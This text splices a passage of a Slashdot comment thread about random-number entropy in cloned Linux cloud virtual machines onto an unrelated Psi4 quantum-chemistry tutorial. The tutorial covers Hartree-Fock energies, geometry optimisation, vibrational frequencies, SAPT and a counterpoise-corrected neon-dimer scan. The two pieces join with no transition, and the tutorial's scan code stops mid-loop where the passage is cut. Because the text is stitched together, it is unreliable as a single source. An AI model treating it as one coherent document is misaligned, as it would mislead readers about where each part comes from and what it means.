number generator. I know not everything uses it but doesn't (Open)SSH? No. By default, OpenSSH will use the system's pesudo-random number generator, but you can also make it use prngd [sourceforge.net] or EGD (the Entropy Gathering Daemon) instead. Whether either are more "secure" than the kernel's built-in RNG I am not qualified to say. Hardware support.... (Score:2) Whether either are more "secure" than the kernel's built-in RNG I am not qualified to say. Well, it depends on the hardware, as the kernel has drivers for various hardware RNG featured on some CPUs or virtualized source of randomness provided by the host. Re: (Score:2) Um, the article is discussing multiple virtual machines with identical disk images so "hardware support" is moot. Re: (Score:2) Troll!? Whoever modded me troll has to have a look at the Avogadro's number and its relationship with this thread. Re: (Score:2) Like Web 2.0, it has at least one or two specific meanings. The problem is getting specific -- a little knowledge is a dangerous thing, and managers can be very fuzzy (clouded?) about "cloud computing" if they don't understand the difference between calling Gmail a "cloud app" and calling Amazon Web Services a "compute cloud". Re: (Score:2) Cloud computing is real, and some of the biggest computers in the world are devoted to it. Climate modeling is a very difficult problem and we still don't have it nearly right. Re: (Score:2) Cloud computing is real[...] Point was it is not well defined. Its like "architecture" or "web 2.0" or "beautiful": everybody knows exactly what it means - but everybody has a different idea of what it is... Re: (Score:2) is that it doesn't exist. It's a farce, a meaningless buzzword, just like web 2.0. A more appropriate word would be servers. You miss the point. We aren't talking about servers, and any ordinary server-provision system wouldn't have the problem highlighted in TFA. We are talking about servers that are initialised on-demand, with a pay-by-the-hour pricing model, so that individual OS installations typically only run for a few hours at a time before being shut down and essentially wiped back to the base insta Re: (Score:2) The host CPU's TSC register would probably be an excellent source. Actually, if 636086 reads the xen mailing lists then it's probably a subtle joke. Re: (Score:2) well... i screwed up and got my threading mixed up so I thought you'd replied to a different post. d'oh. All I was saying is that based on recent discussions on xen-devel concerning TSC synchronisation when physical CPU's are scheduled into virtual CPU's in a VM, the value might as well be a random number for the amount of use that it is. I assumed you were making a joke about that, but obviously you were replying to a different post than I thought you were. Re: (Score:2) A book of random numbers is great for statistics. If that's your use there's no need to do anything else, and RAND's book is still a good choice. But the value of random numbers in things like cryptography is that they are unpredictable. If everyone is using the same list the numbers are entirely predictable and therefore useless. A typical example is the hybrid cryptosystem used in public-key encryption -- the computer picks a random number for use as the secret key for the shared-secret cypher, encrypts th Re: (Score:2) As part of cloning the image just do this: dd if=/dev/urandom of=/target/var/lib/urandom count=1 bs=4096 There. Fixed it for you. Works better if the VM server has a high volume entropy source, but even if not it is still pretty damn good. Except this is somewhat harder to do if you're running a service where you provide virtual machines that run OS images from unknown sources, that could be running basically any OS/distribution the user wishes, with the image using practically any file system that has ever be
http://it.slashdot.org/story/09/08/03/2151225/entropy-problems-for-linux-in-the-cloud
CC-MAIN-2014-52
refinedweb
5,237
63.19
Re: what does 'a=b=c=[]' do - From: Rolf Camps <rolf@xxxxxxx> - Date: Thu, 22 Dec 2011 09:51:54 +0100 alex23 schreef op wo 21-12-2011 om 16:50 [-0800]:) I'm afraid it's dangerous to encourage the use of '[]' as assignment to a parameter in a function definition. If you use the function several times 'default' always points to the same list. >>> def return_list(list_ = []): >>> return list_ >>> a_list = return_list() >>> a_list [] >>> a_list.append(3) >>> a_list [3] >>> b_list = return_list() >>> b_list >>> [3] # !!?? >>> def return_list(): >>> return [] >>> a_list = return_list() >>> a_list [] >>> a_list.append(3) >>> a_list [3] >>> b_list = return_list() >>> b_list >>> [] # OK! I only use python3 so I don't know how these things work in other versions. No problem in your function since you yield a copy, but I've already seen long threads about this. I would change your function to (Python3.x): def empty_lists(count): for _ in range(count): yield [] Regards, Rolf . - Follow-Ups: - Re: what does 'a=b=c=[]' do - From: alex23 - References: - what does 'a=b=c=[]' do - From: Eric - Re: what does 'a=b=c=[]' do - From: alex23 - Prev by Date: Adding an interface to existing classes - Next by Date: Item Checking not possible with UltimateListCtrl in ULC_VIRTUAL mode - Previous by thread: Re: what does 'a=b=c=[]' do - Next by thread: Re: what does 'a=b=c=[]' do - Index(es):
http://coding.derkeiler.com/Archive/Python/comp.lang.python/2011-12/msg01148.html
CC-MAIN-2015-18
refinedweb
224
79.09
You can subscribe to this list here. Showing 3 results of 3 latest version of OBI: how to use SVN: agenda: - release starting this week: please be extra careful when editing agreement to go ahead with release, MC wil check with PRS and SAS about MSI terms from coord: terms from non-OBI namespace (NMR, CHROM) will be removed for this release >From Coord: working on Namespaces policy: - For the current terms, the decision is if we manage to translate definition source to OBO we will go ahead and put everything under OBI ns - AI for PRS and MC to check on OBO format for next week - PRS and FG to work on policy for ns when joining OBI - circulate draft for comments and put up for voting, then add to the wiki - import of IAO -> need lock on files (touches all of them) the terms will replace DENRIE and part of plan branch; OBI work and sourcing credit will be preserved, but the IDs will change MC has run the reasoner and the terms are consistent, however there are duplicates, for example data format specification Manuscript will be submitted to Nature Biotech AI JF _- find out where the current version is and how we edit it JF volunteered to lead the next dev call Melanie, can you please update the wiki with these notes unless someone objects? thanks! Jennifer Fostel, Ph.D. CEBS Scientific Administrator Global Health Sector, SRA International, Inc Laboratory of Respiratory Biology NIEHS, NIH PO Box 12233 Mail Drop F1-05 111 Alexander Drive Research Triangle Park NC 27709-2233 phone 919 541 5055 i will offer to run the call today what are agenda items to discuss? ...jennifer -----Original Message----- From: Bjoern Peters [mailto:bpeters@...] Sent: Wednesday, November 19, 2008 10:14 AM To: OBI Developers Subject: [Obi-devel] can't make call today Also: we have neglected to assign people to run the dev calls in the past weeks. If someone would volunteer for today, that would be great. Going forward, I would like to exclude myself from running dev calls, as I already do the coord ones. ------------------------------------------------------------------------ - This SF.Net email is sponsored by the Moblin Your Move Developer's challenge Build the coolest Linux based applications with Moblin SDK & win great prizes Grand prize is a trip for two to an Open Source event anywhere in the world _______________________________________________ Obi-devel mailing list Obi-devel@... Also: we have neglected to assign people to run the dev calls in the past weeks. If someone would volunteer for today, that would be great. Going forward, I would like to exclude myself from running dev calls, as I already do the coord ones.
http://sourceforge.net/p/obi/mailman/obi-devel/?viewmonth=200811&viewday=19
CC-MAIN-2014-23
refinedweb
449
51.45
String Buffer class in Java is a JDK 5.0 Specification that is used to create mutable strings. It is available in java.util package. It can also have methods provided in this class which directly manipulate the data inside the object. Creating String Buffer Object: There are two ways to create string buffer object 1. We can create string buffer object using new operator and passing the string to object as StringBuffer sb = new StringBuffer("Hello"); 2. Another way of creating StringBuffer object is to first allocate memory to StringBuffer object using new operator and later storing the string into it. StringBuffer sb = new StringBuffer(); When you create like this StringBuffer object allocates a size of 16 characters. Even though we can increase the size of the StringBuffer object when required. Commonly Used Methods 1. s1.setCharAt(n,'x') - Modifies the nth character to "x" 2.s1.append(s2) - Appends the string s2 to s1 at the end 3.s1.setLength(n) - sets the string length to n 4. s1.insert(n,s2) - Insert the string s2 at the position of n in string s1. Example program import java.util.*; import java.lang.*; import java.io.*; class SBDemo { public static void main(String[] args) { StringBuffer sb=new StringBuffer("object Oriented"); System.out.println("Original String is:"+ sb); System.out.println("length of String is:"+ sb.length()); sb.setCharAt(6,'-'); // inserting character at 6th position in string StringBuffer s2=new StringBuffer("language"); sb.insert(15,s2); // inserting string at 15th posotion in string System.out.println("Modified String is:"+ sb); } }Output: D:\java examples>javac SBDemo.java D:\java examples>java SBDemo Original String is:object Oriented length of String is:15 Modified String is:object-Oriented language Difference between string and StringBuffer Note: only a member of this blog may post a comment.
http://www.tutorialtpoint.net/2021/12/string-buffer-class-in-java.html
CC-MAIN-2022-05
refinedweb
304
51.14
Hi.. i search a lot on net but couldnt found solution so thought to ask here.. i want to change default namespace in VS2010 When i create asp.net website by default i got this namespaces in the .cs file of webform using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; But i want to add System.Data namespace By default whenever i add any new website.. is there any solution? View Folks, i have 5 tabs in my master page application. how can i make 2nd tab as default? any ideas? Thanks, I have a standard Document Library where I uploaded various kinds of file (.pdf, swf). Whenever I click on an item (or I paste its direct link into the browser) it prompts me to download it instead of opening it into the browser directly (with flash player or acrobrat in my example). How to obtain the desired behavior? Thanks. In Visual Studio !when I Run project it will display Default.aspx page, Now I want run project it will display mypage.aspx ! how do I setting it ? help me ! Hall of Fame Twitter Terms of Service Privacy Policy Contact Us Archives Tell A Friend
http://www.dotnetspark.com/links/61427-change-default-namespace-vs2010.aspx
CC-MAIN-2017-51
refinedweb
209
70.5
Hello I have a question regarding the function length(). I want to find out the length of the string that is inputted by the user. When I use the length() function it only counts the characters from the first word. Can somebody please take a look at my code and determine why my code is only outputting the number of characters from the first word. For example: when the user inputs "hello" my program out puts 5, when the user inputs "hello world" the program still outputs 5. #include <iostream> #include <fstream> #include <string> #include <cctype> #include <cstdio> using namespace std; int main() { string sentence; cout<<"please enter a string: "<<endl; cin>> sentence; int length = sentence.length(); cout<< length; cin.get(); }
https://www.daniweb.com/programming/software-development/threads/364150/string-length-function
CC-MAIN-2017-34
refinedweb
121
71.24
Unformatted text preview: Project 2: Recursive Data Structures EECS 280 Winter 2011 Due: Tuesday, February 8th, 11:59 PM Introduction This project will give you experience writing recursive functions that operate on recursively-defined data structures and mathematical abstractions. Lists A "list" is a sequence of zero or more numbers in no particular order. A list is well formed if: a) It is the empty list, or b) It is an integer followed by a well-formed list. A list is an example of a linear-recursive structure: it is "recursive" because the definition refers to itself. It is "linear" because there is only one such reference. Here are some examples of well-formed lists: ( 1 2 3 4 ) // a list of four elements ( 1 2 4 ) // a list of three elements ( ) // a list of zero elements--the empty list The file recursive.h defines the type "list_t" and the following operations on lists: bool list_isEmpty(list_t list); // EFFECTS: returns true if list is empty, false otherwise list_t list_make(); // EFFECTS: returns an empty list. list_t list_make(int elt, list_t list); // EFFECTS: given the list (list) make a new list consisting of // the new element followed by the elements of the // original list. int list_first(list_t list); // REQUIRES: list is not empty // EFFECTS: returns the first element of list list_t list_rest(list_t list); // REQUIRES: list is not empty // EFFECTS: returns the list containing all but the first element // of list void list_print(list_t list); // MODIFIES: cout // EFFECTS: prints list to cout. Note: list_first and list_rest are both partial functions; their EFFECTS clauses are only valid for non- empty lists. To help you in writing your code, these functions actually check to see if their lists are empty or not--if they are passed an empty list, they fail gracefully by warning you and exiting; if you are running your program under the debugger, it will stop at the exit point. Note that such checking is not required! It would be perfectly acceptable to write these in such a way that they fail quite ungracefully if passed empty lists. Note also that list_make is an overloaded function - if called with no arguments, it produces an empty list. If called with an element and a list, it combines them. Given this list_t interface, you will write the following list processing procedures. Each of these procedures must be tail recursive. For full credit, your routines must provide the correct result and provide an implementation that is tail-recursive. In writing these functions, you may use only recursion and selection. You are NOT allowed to use goto, for, while, or do-while, nor are you allowed to use global variables. Remember: a tail-recursive function is one in which the recursive call happens absent any pending computation in the caller. For example, the following is a tail-recursive implementation of factorial: static int factorial_helper(int n, int result) // REQUIRES: n >= 0 // EFFECTS: computes result * n! { if (!n) { return result; } else { return factorial_helper(n-1, n*result); } } int factorial_tail(int n) // REQUIRES: n >= 0 // EFFECTS: computes n! { factorial_helper(n, 1); } Notice that the return value from the recursive call to factorial_helper() is only returned again---it is not used in any local computation, nor are there any steps left after the recursive call. The tail-recursive version of factorial requires a helper function. This is common, but not always necessary. If you define any helper functions, be sure to declare them "static", so that they are not visible outside your program file. This will prevent any name conflicts in case you give a function the same name as one in the test harness. The function factorial_helper, above, is defined as a static function. As another example, the following is *not* tail-recursive: int factorial(int n) // REQUIRES: n >= 0 // EFFECTS: computes n! { if (!n) { return 1; } else { return (n * factorial(n-1)); } } Notice that the return value of the recursive call to factorial is used in a computation in the caller--- namely, it is multiplied by n. Here are the functions you are to implement. There are several of them, but many of them are similar to one another, and the longest is at most tens of lines of code, including support functions. int sum(list_t list); /* // EFFECTS: returns the sum of each element in list // zero if the list is empty. */ int product(list_t list); /* // EFFECTS: returns the product of each element in list // one if the list is empty. */ int accumulate(list_t list, int (*fn)(int, int), int identity); /* // REQUIRES: fn must be associative. // EFFECTS: return identity if list is empty // return fn(list_first(list), // accumulate(list_rest(list), fn, identity)) // otherwise. // // For example, if you have the following function: // // int add(int x, int y); // // Then the following invocation returns the sum of all elements: // // accumulate(list, add, 0); // // The "identity" argument is typically the value for which // fn(X, identity) == X, for any X. */ list_t reverse(list_t list); /* // EFFECTS: returns the reverse of list // // For example: the reverse of ( 3 2 1 ) is ( 1 2 3 ) */ list_t append(list_t first, list_t second); /* // EFFECTS: returns the list (first second) */ list_t /* // // // // // // */ list_t /* // // // // // // */ filter_odd(list_t list); EFFECTS: returns a new list containing only the elements of the original list which are odd in value, in the order in which they appeared in list. For example, if you applied filter_odd to the list ( 4 1 3 0 ) you would get the list ( 1 3 ) filter_even(list_t list); EFFECTS: returns a new list containing only the elements of the original list which are even in value, in the order in which they appeared in list For example, if you applied filter_odd to the list ( 4 1 3 0 ) you would get the list ( 4 0 ) list_t filter(list_t list, bool (*fn)(int)); /* // EFFECTS: returns a list containing precisely the elements of // list for which the predicate fn() evaluates to true, // in the order in which they appeared in list. */ list_t rotate(list_t list, unsigned int n); /* // EFFECTS: returns a list equal to the original list with the // first element moved to the end of the list n times. // // For example, rotate(( 1, 2, 3, 4), 2) yields ( 3, 4, 1, 2 ) */ list_t insert_list(list_t first, list_t second, unsigned int n); /* // REQUIRES: n <= the number of elements in first // EFFECTS: returns a list comprising the first n elements of // "first", followed by all elements of "second", // followed by any remaining elements of "first". // // For example: insert (( 1 2 3 ), ( 4 5 6 ), 2) // is ( 1 2 4 5 6 3 ). */ list_t chop(list_t l, unsigned int n); /* // REQUIRES l has at least n elements // EFFECTS: returns the list equal to l without its last n // elements */ Fibonacci numbers Not all recursive definitions are necessarily linear-recursive. For example, consider the Fibonacci numbers: fib(0) = 0; fib(1) = 1; fib(n) = fib(n-1) + fib(n-2); (n > 1) This is called a "tree-recursive" definition; the definition of fib(N) refers to fib() twice. You can see why this is so by drawing a picture of evaluating fib(3): fib(3) / \ fib(2) + fib(1) / \ | fib(0) + fib(1) 1 | | 0 1 The call pattern forms a tree. You are to write two versions of fib(), as follows. The first one should be written recursively, in this tree pattern. It should not be tail-recursive (and so should not call the second!). The second must be tail-recursive and is tricky, but we've supplied a hint. int fib(int n); /* // REQUIRES: n >= 0 // EFFECTS: computes the Nth Fibonacci number // fib(0) = 0 // fib(1) = 1 // fib(n) = fib(n-1) + fib(n-2) for (n>1). // This need not be tail recursive */ int fib_tail(int n); /* // REQUIRES: n >= 0 // EFFECTS: computes the Nth Fibonacci number // fib(0) = 0 // fib(1) = 1 // fib(n) = fib(n-1) + fib(n-2) for (n>1). // MUST be tail recursive // Hint: instead of starting at n and working down, start with // 0 and 1 and work *upwards*. */ Binary Trees The Fibonacci numbers appear to be tree-recursive, but can be computed in a way that is linear- recursive. This is not true for all tree-recursive problems. For example, consider the following definition of a binary tree: A binary tree is well formed if: a) It is the empty tree, or b) It consists of an integer element, plus two children, called the left subtree and the right subtree, each of which is a well-formed binary tree. Additionally, we say a binary tree is a "leaf" if and only if both of its children are the EMPTY_TREE. The file recursive.h defines the type "tree_t" and the following operations on trees: extern bool tree_isEmpty(tree_t tree); // EFFECTS: returns true if tree is empty, false otherwise extern tree_t tree_make(); // EFFECTS: creates an empty tree. extern tree_t tree_make(int elt, tree_t left, tree_t right); // EFFECTS: creates a new tree, with elt as it's element, left as // its left subtree, and right as its right subtree extern int tree_elt(tree_t tree); // REQUIRES: tree is not empty // EFFECTS: returns the element at the top of tree. extern tree_t tree_left(tree_t tree); // REQUIRES: tree is not empty // EFFECTS: returns the left subtree of tree extern tree_t tree_right(tree_t tree); // REQUIRES: tree is not empty // EFFECTS: returns the right subtree of tree extern void tree_print(tree_t tree); // MODIFIES: cout // EFFECTS: prints tree to cout. // Note: this uses a non-intuitive, but easy-to-print // format. There are four functions you are to write for binary trees. These must be recursive, and cannot use any looping structures. They do not need to be tail-recursive. int tree_sum(tree_t tree); // EFFECTS: returns the sum of all elements in the tree, // zero if the tree is empty list_t /* // // // // // // // // // // // // // // // // // // // // // // // */ traversal(tree_t tree); MODIFIES: EFFECTS: returns the elements of tree in a list using an in-order traversal. An in-order traversal yields a list with the "left most" element first, then the second-left-most, and so on, with the right-most element last. for example, the tree: 4 / / 2 / \ 3 / \ would return the list ( 2 3 4 5 ) An empty tree would print as: ( ) \ \ 5 / \ We can define a special relation between trees "is covered by" as follows: An empty tree is covered by all trees The empty tree covers only other empty trees. For any two non-empty trees, A and B, A is covered by B if and only if the top-most elements of A and B are equal, the left subtree of A is covered by the left subtree of B, and the right subtree of A is covered by the right subtree of B. For example, the tree: 4 / \ / \ 2 5 / \ / \ 3 / \ Covers the tree: 4 / \ / 2 / \ But not the trees: 4 5 / / \ / or 3 / \ In light of this definition, write the following function: bool contained_by(tree_t A, tree_t B); /* EFFECTS: returns true if A is covered by B, or any complete // subtree of B. */ You need not explicitly write covered_by, but we recommend it, as it is likely to make your solution simpler overall to separate it. In other words, the trees 4 / \ / 2 / \ Are contained by the tree 5 / \ and 4 / / 2 / \ 3 / \ But this tree is not: 4 / / 3 / \ There exists a special kind of binary tree, called the sorted binary tree. A sorted binary tree is well- formed if: 1. It is a well-formed binary tree and 2. One of the following is true: a. The tree is empty b. The left subtree is a sorted binary tree, and any elements in the left subtree are strictly less than the top element of the tree. - AND - The right subtree is a sorted binary tree, and any elements in the right subtree are greater than or equal to the top element of the tree. For example, the following are all well-formed sorted binary trees: 4 1 / \ / \ / \ 1 2 6 / \ / \ / \ 2 1 3 5 7 / \ / \ / \ / \ / \ (eight empty trees) \ \ 5 / \ While the following are not: 1 / \ 1 / \ 1 / \ 2 3 2 3 4 / / \ 1 \ 6 \ 7 You are to write the following function for creating sorted binary trees: tree_t insert_tree(int elt, tree_t tree); /* // REQUIRES; tree is a sorted binary tree // EFFECTS: returns a new tree with elt inserted at a leaf // such that the resulting tree is also a sorted // binary tree. // // for example, inserting 1 into the tree: // // 4 // / \ // / \ // 2 5 // / \ / \ // 3 // / \ // // would yield the tree: // 4 // / \ // / \ // 2 5 // / \ / \ // 1 3 // / \ / \ // // Hint: an in-order traversal of a sorted binary tree is always // a sorted list, and there is only one unique location for // any element to be inserted. */ Files There are several files installed in the directory: /afs/umich.edu/class/eecs280/proj2 p2.h the header file for the functions you must write recursive.h the list_t and tree_t interfaces recursive.cpp the implementations of list_t and tree_t You should put all of the functions you write in a single file, called p2.cpp. You may use only the C++ standard and iostream libraries, and no others. You may use assert() if you wish, but you do not need to. You may not use global variables. You can think of p2.cpp as providing a library of functions that other programs might use, just as recursive.cpp does. DO NOT INCLUDE a main function in your p2.cpp file. We will provide this function when using your code as a library to test your functions. To test your code, you should create a family of test case programs that exercise these functions. We have placed a handful of test cases in /afs/umich.edu/class/eecs280/proj2. Here is a simple one to get you started. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #include <iostream> #include "p2.h" using namespace std; int main() { int i; list_t listA; list_t listB; listA = list_make(); listB = list_make(); for (i = 5; i>0; i--) { listA = list_make(i, listA); listB = list_make(i+10, listB); } list_print(listA); cout << endl; list_print(listB); cout << endl; list_print(reverse(listA)); cout << endl; list_print(append(listA, listB)); cout << endl; } +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Here is how to build this test case, called simple_test.cpp, into a program, given your own implementation of p2.cpp plus our implementation of recursive.cpp: g++ -O1 -Wall -Werror -o simple_test simple_test.cpp p2.cpp recursive.cpp Note the O1 flag (capital O, not zero), just as we used in Project 1. It detects uninitialized variables, but should not be used if you are compiling for debugging. When you run it, this is the output you should see: ./simple_test ( 1 2 3 4 5 ) ( 11 12 13 14 15 ) ( 5 4 3 2 1 ) ( 1 2 3 4 5 11 12 13 14 15 ) We have provided two more test cases for you to try out. These two are self-verifying (they tell you if they succeeded or failed). Handing in and grading You should hand in your program, p2.cpp, via submit280 before the deadline. See CTools for more information on submit280. Your program will be graded along three criteria: 1) Functional Correctness 2) Implementation Constraints 3) General Style An example of Functional Correctness is whether or not your reverse function reverses a list properly in all cases. An example of an Implementation Constraint is whether reverse() is tail-recursive. General Style speaks to the cleanliness and readability of your code. ... View Full Document - Spring '08 - NOBLE - Data Structures, Fibonacci number, The Elements Click to edit the document details
https://www.coursehero.com/file/6780700/Project-2/
CC-MAIN-2018-09
refinedweb
2,575
57.81
PsiAPI Tutorial: Using Psi4 as a Python Module¶ transcribed by D. A. Sirianni psi4.in front, then submit it to the executable psi4which processes the Psithon into pure Python and runs it internally. In PsiAPI mode, you write a pure Python script with import psi4at the top and commands are behind the psi4.namespace, then submit it to the pythoninterpreter. Both modes are equally powerful. This tutorial covers the PsiAPI mode. Warning: Although the developers have been using PsiAPI mode stably for months before the 1.1 release and while we believe we’ve gotten everything nicely arranged within the psi4. namespace, the API should not be considered completely stable. Most importantly, as we someday deprecate the last of the global variables, options will be added to the method calls (e.g., energy('scf', molecule=mol, options=opt)) Note: Consult How to run Psi4 as Python module after compilation or How to run Psi4 as a Python module from conda installation for assistance in setting up Psi4. Unlike in the past, where Psi4 was executable software which could only be called via input files like input.dat, it is now interactive, able to be loaded directly as a Python module. Here, we will explore the basics of using Psi4 in this new style by reproducing the section A Psi4 Tutorial from the Psi4 manual in an interactive Jupyter Notebook. Note: If the newest version of Psi4 (v.1.1a2dev42 or newer) is in your path, feel free to execute each cell as you read along by pressing Shift+Enter when the cell is selected. I. Basic Input Structure¶ Psi4 is now a Python module; so, we need to import it into our Python environment: [1]: try: import os, sys sys.path.insert(1, os.path.abspath('/scratch/psilocaluser/conda-builds/psi4-docs-multiout_1550214125402/work/build/stage//scratch/psilocaluser/conda-builds/psi4-docs-multiout_1550214125402/_h_env_placehold_placehold_place/lib/python3.6/site-packages')) except ImportError: pass import psi4 Psi4 is now able to be controlled directly from Python. By default, Psi4 will print any output to the screen; this can be changed by giving a file name (with path if not in the current working directory) to the function psi4.core.set_output_file() API, as a string: [2]: psi4.core.set_output_file('output.dat', False) Additionally, output may be suppressed by instead setting psi4.core.be_quiet() API. II. Running a Basic Hartree-Fock Calculation¶ In our first example, we will consider a Hartree-Fock SCF computation for the water molecule using a cc-pVDZ basis set. First, we will set the available memory for Psi4 to use with the psi4.set_memory() API function, which takes either a string like '30 GB' (with units!) or an integer number of bytes of memory as its argument. Next, our molecular geometry is passed as a string into psi4.geometry() API. We may input this geometry in either Z-matrix or Cartesian format; to allow the string to break over multiple lines, use Python’s triple-quote """string""" syntax. Finally, we will compute the Hartree-Fock SCF energy with the cc-pVDZ basis set by passing the method/basis set as a string ( 'scf/cc-pvdz') into the function psi4.energy() API: [3]: #! Sample HF/cc-pVDZ H2O Computation psi4.set_memory('500 MB') h2o = psi4.geometry(""" O H 1 0.96 H 1 0.96 2 104.5 """) psi4.energy('scf/cc-pvdz') [3]: -76.02663273488399 If everything goes well, the computation should complete and should report a final restricted Hartree-Fock energy in the output file output.dat in a section like this: Energy converged. @DF-RHF Final Energy: -76.02663273486682 the main Psi4 manual section Compiling and Installing from Source). This very simple input is sufficient to run the requested information. Notice we didn’t tell the program some otherwise useful information like the charge the electrons are paired. For example, let’s run a computation on methylene (\(\text{CH}_2\)), first stored and then inserted into the geometry specification using Python 3 string formatting. [4]: #! Sample UHF/6-31G** CH2 Computation R = 1.075 A = 133.93 ch2 = psi4.geometry(""" 0 3 C H 1 {0} H 1 {0} 2 {1} """.format(R, A) ) psi4.set_options({'reference': 'uhf'}) psi4.energy('scf/6-31g**') [4]: -38.925334628859886 Executing this cell should yield the final energy as @DF-UHF Final Energy: -38.92533462887677 Notice the new command, psi4.set_options() API, to the input. This function takes a Python dictionary as its argument, which is a key-value list which associates a Psi4 keyword with its user-defined value.). III. Geometry Optimization and Vibrational Frequency Analysis¶ The above examples were simple single-point energy computations (as specified by the psi4.energy() API function). Of course there are other kinds of computations to perform, such as geometry optimizations and vibrational frequency computations. These can be specified by replacing psi4.energy() API with psi4.optimize() API or psi4.frequency() API, respectively. Let’s take a look at an example of optimizing the H\(_2\)O molecule using Hartree-Fock with a cc-pVDZ basis set. Now, here comes the real beauty of running Psi4 interactively: above, when we computed the energy of H\(_2\)O with HF/cc-pVDZ, we defined the Psi4 molecule object h2o. Since we’re still in the Python shell, as long as you executed that block of code, we can reuse the h2o molecule object in our optimization without redefining it, by adding the molecule=h2o argument to the psi4.optimize() API function: [5]: psi4.set_options({'reference': 'rhf'}) psi4.optimize('scf/cc-pvdz', molecule=h2o) Optimizer: Optimization complete! [5]: -76.02703272937504 This should perform a series of gradient computations. The gradient points which way is downhill in energy, and the optimizer then modifies the geometry to follow the gradient. After a few cycles, the geometry should converge with a message like Optimization). --------------------------------------------------------------------------------------------------------------- ~ Step Total Energy Delta E MAX Force RMS Force MAX Disp RMS Disp ~ --------------------------------------------------------------------------------------------------------------- ~ 1 -76.026632734908 -76.026632734908 0.01523518 0.01245755 0.02742222 0.02277530 ~ 2 -76.027022666011 -0.000389931104 0.00178779 0.00142946 0.01008137 0.00594928 ~ 3 -76.027032729374 -0.000010063363 0.00014019 0.00008488 0.00077463 0.00044738 ~ --------------------------------------------------------------------------------------------------------------- ~ To get harmonic vibrational frequencies, it’s important to keep in mind that the values of the vibrational frequencies are a function of the molecular geometry. Therefore, it’s important to obtain the vibrational frequencies AT THE OPTIMIZED GEOMETRY. Luckily, Psi4 updates the molecule with optimized geometry as it is being optimized. So, the optimized geometry for H\(_2\)O is stored inside the h2o molecule object, which we can access! To compute the frequencies, all we need to do is to again pass the molecule=h2o argument to the psi4.frequency() API function: [6]: scf_e, scf_wfn = psi4.frequency('scf/cc-pvdz', molecule=h2o, return_wfn=True, dertype=1) 6 displacements needed. 1 2 3 4 5 6 Executing this cell will prompt Psi4 to compute the Hessian (second derivative matrix) of the electronic energy with respect to nuclear displacements. From this, it can obtain the harmonic vibrational frequencies, given below (roundoff errors of around \(0.1\) cm\(^{-1}\) may exist): Irrep Harmonic Frequency (cm-1) ----------------------------------------------- A1 1775.6478 A1 4113.3795 B2 4212.1814 ----------------------------------------------- Notice the symmetry type of the normal modes is specified (A1, A1, B2). The program also print out the normal modes in terms of Cartesian coordinates of each atom. For example, the normal mode at \(1776\) cm\(^{-1}\) is: Frequency: 1775.65 Force constant: 0.1193 X Y Z mass O 0.000 0.000 -0.068 15.994915 H 0.000 0.416 0.536 1.007825 H 0.000 -0.416 0.536 1.007825 output.dat. The vibrational frequencies are sufficient to obtain vibrational contributions to enthalpy (H), entropy (S), and Gibbs free energy (G). Similarly, the molecular geometry is used to obtain rotational constants, which are then used to obtain rotational contributions to H, S, and G. Note: Psi4 has several synonyms for the functions called in this example. For instance, psi4.frequency() API will compute molecular vibrational frequencies, and psi4.optimize() API will perform a geometry optimization. IV.: [7]: # Example SAPT computation for ethene*ethyne (*i.e.*, ethylene*acetylene). # Test case 16 from S22 Database dimer = psi4.geometry(""" 0 1 C 0.000000 -0.667578 -2.124659 C 0.000000 0.667578 -2.124659 H 0.923621 -1.232253 -2.126185 H -0.923621 -1.232253 -2.126185 H -0.923621 1.232253 -2.126185 H 0.923621 1.232253 -2.126185 -- 0 1 C 0.000000 0.000000 2.900503 C 0.000000 0.000000 1.693240 H 0.000000 0.000000 0.627352 H 0.000000 0.000000 3.963929 units angstrom """) Here’s the second half of the input, where we specify the computation options: [8]: psi4.set_options({'scf_type': 'df', 'freeze_core': 'true'}) psi4.energy('sapt0/jun-cc-pvdz', molecule=dimer) [8]: -0.0022355825227244703 All of the options we have currently set using psi4.set_options() API are “global” options (meaning that they are visible to all parts of the program). Most common Psi4 options can be set like this. If an option needs to be visible only to one part of the program (e.g., we only want to increase the energy convergence in the SCF code, but not the rest of the code), it can be set by with the psi4.set_module_options() API function, psi4.set_module_options('scf', {'e_convergence': '1e-8'}). Note: The arguments to the functions we’ve used so far, like psi4.set_options() API, psi4.set_module_options() API, psi4.energy() API, psi4.optimize() API, psi4.frequency() API, etc., are case-insensitive. by adding 'scf_type': 'df' to the dictionary passed to psi4.set_options(). by adding 'freeze_core': 'true' to the dictionary passed to psi4.set_options(). The SAPT procedure is invoked by psi4.energy('sapt0/jun-cc-pvdz', molecule=dimer). Here, Psi4 of the Psi4 ( Elst10,r where the 1 indicates the first-order perturbation theory result with respect to the intermolecular interaction, and the 0 indicates zeroth-order with respect to the intramolecular electron correlation). The next most attractive contribution is the Disp20 term (second order intermolecular dispersion, which looks like MP2 in which one excitation is placed on each monomer), contributing an attraction of \(-1.21\) kcal/mol.. V. Potential Surface Scans and Counterpoise Correction Made Easy¶ Finally, let’s consider an example which highlights the advantages of being able to interact with Psi4 directly with Python. Suppose you want to do a limited potential energy surface scan, such as computing the interaction energy between two neon atoms at various interatomic distances. One simple but unappealing way to do this is to generate separate geometries for each distance to be studied. Instead, we can leverage Python loops and string formatting to make our lives simpler. Additionally, let’s couter psi4.geometry() string can be used to separate monomers. So, we’re going to do counterpoise-corrected CCSD(T) energies for Ne\(_2\) at a series of different interatomic distances. And let’s print out a table of the interatomic distances we’ve considered, and the CP-corrected CCSD(T) interaction energies (in kcal/mol) at each geometry: [9]: #! Example potential energy surface scan and CP-correction for Ne2 ne2_geometry = """ Ne -- Ne 1 {0} """ Rvals = [2.5, 3.0, 4.0] psi4.set_options({'freeze_core': 'true'}) # Initialize a blank dictionary of counterpoise corrected energies # (Need this for the syntax below to work) ecp = {} for R in Rvals: ne2 = psi4.geometry(ne2_geometry.format(R)) ecp[R] = psi4.energy('ccsd(t)/aug-cc-pvdz', bsse_type='cp', molecule=ne2) # Prints to screen print("CP-corrected CCSD(T)/aug-cc-pVDZ Interaction Energies\n\n") print(" R [Ang] E_int [kcal/mol] ") print("---------------------------------------------------------") for R in Rvals: e = ecp[R] * psi4.constants.hartree2kcalmol print(" {:3.1f} {:1.6f}".format(R, e)) # Prints to output.dat psi4.core.print_out("CP-corrected CCSD(T)/aug-cc-pVDZ Interaction Energies\n\n") psi4.core.print_out(" R [Ang] E_int [kcal/mol] \n") psi4.core.print_out("---------------------------------------------------------\n") for R in 